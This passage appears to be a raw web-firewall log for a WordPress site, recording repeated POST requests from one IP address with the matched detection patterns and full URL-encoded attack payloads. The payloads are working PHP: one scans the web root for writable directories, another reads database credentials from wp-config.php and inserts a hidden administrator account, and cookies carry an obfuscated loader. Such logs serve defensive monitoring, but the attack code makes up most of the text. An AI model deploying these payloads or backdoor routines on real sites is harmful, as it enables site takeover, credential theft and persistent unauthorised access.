8%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20","POST \/ HTTP\/1.1\nsec-ch-ua-platform:\"Windows\"\ncontent-length:3339\nsec-fetch-site:none\nsec-fetch-mode:navigate\nsec-fetch-user:?1\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\ncookie:4=9502d8dfeef0bdc4da77dd3a93ec6aec; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvrH0vKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzAioaEyoaDvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/104.0.0.0 Safari\/537.36\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\nsec-ch-ua:\"Chromium\";v=\"104\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"104\"\ncontent-type:application\/x-www-form-urlencoded\nsec-ch-ua-mobile:?0\n\nyM=%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20"]
["2026-05-16 16:19:54","213.209.159.254","POST","\/","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/104.0.0.0 Safari\/537.36","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> kH:%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20","POST \/ HTTP\/1.1\nsec-ch-ua-platform:\"Windows\"\ncontent-length:3339\nsec-fetch-site:none\nsec-fetch-mode:navigate\nsec-fetch-user:?1\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\ncookie:4=1af844051764377410b827578daae50e; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvn0tvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzyhqTIlozSfVwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/104.0.0.0 Safari\/537.36\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\nsec-ch-ua:\"Chromium\";v=\"104\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"104\"\ncontent-type:application\/x-www-form-urlencoded\nsec-ch-ua-mobile:?0\n\nkH=%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20"]
["2026-05-16 16:20:42","213.209.159.254","POST","\/","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/110.0.0.0 Safari\/537.36","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> SA:%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20","POST \/ HTTP\/1.1\nsec-ch-ua-platform:\"Windows\"\ncontent-length:3339\nsec-fetch-site:none\nsec-fetch-mode:navigate\nsec-fetch-user:?1\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\ncookie:4=ce288246c7d2df0454c666077eb603cf; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvH0RvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzSwL2IjqPV7nJLbMzyfMI9jqKEsL29hqTIhqUZbWUNfWTZcXKgcozAfqJEyVPEjB0O1ozkcozfbWUNcB2I4nKD7sK19MTyyXPVuoz90q3W0LzjuVvx7; 1=53; 0=71\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/110.0.0.0 Safari\/537.36\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\nsec-ch-ua:\"Chromium\";v=\"110\", \"Not A(Brand\";v=\"24\", \"Google Chrome\";v=\"110\"\ncontent-type:application\/x-www-form-urlencoded\nsec-ch-ua-mobile:?0\n\nSA=%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20"]
["2026-05-16 18:00:20","213.209.159.254","POST","\/","Mozilla\/5.0 (Linux; Android 12; Pixel 6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.58 Mobile Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> Gv:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20